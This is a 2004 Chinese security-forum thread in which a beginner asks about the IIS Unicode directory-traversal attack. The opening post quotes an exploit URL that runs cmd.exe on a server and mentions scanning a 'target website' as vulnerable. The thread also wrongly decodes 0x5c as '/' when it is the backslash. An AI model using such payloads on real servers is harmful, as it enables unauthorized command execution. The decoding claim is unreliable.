|
 | 作者: kdk9999 [kdk9999]
 论坛用户 |
登录 |
| 今天看到一篇教程关于UNICODE的 但是还有很多问题不知 %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' 11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 请问既然 %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' 为什么不在11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 中直接用“/”代替 还有我发现我的目标网站只能用域名登陆,直接用IP登陆却不行 而且用URL根本就进不去 我找了很多关于UNICODE的但是始终找不到能解我迷惑的 希望知道这方面问题的朋友能帮帮我 |
| 地主 发表时间: 04-07-30 00:29 |
 | 回复: abctm [abctm]  版主 |
登录 |
|
现在这样漏洞已经很有了,能扫到是奇迹 |
| B1层 发表时间: 04-07-30 00:46 |
| 回复: kdk9999 [kdk9999] 论坛用户 |
登录 |
|
但是我扫那个网站时说是有这个漏洞的 还有能帮我回答一下我提的问题吗? |
| B2层 发表时间: 04-07-30 11:15 |
 | 回复: lijingxi [lijingxi]  见习版主 |
登录 |
|
什么网站现在还有这漏洞啊! 有这漏洞还能开站!我服了!这都是几年前的漏洞了! 哎!昏了! |
| B3层 发表时间: 04-07-30 16:49 |
 | 回复: zjh1982410 [zjh1982410]  论坛用户 |
登录 |
|
请问既然 %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' 为什么不在11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 中直接用“/”代替 楼主可以说明白么? |
| B4层 发表时间: 04-07-30 21:12 |
| 回复: kdk9999 [kdk9999] 论坛用户 |
登录 |
|
可能我理解的不够 能告诉我这是什么意思吗? %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' |
| B5层 发表时间: 04-07-31 11:03 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 菜鸟乐园 标题: 关于UNICODE入侵的几点疑问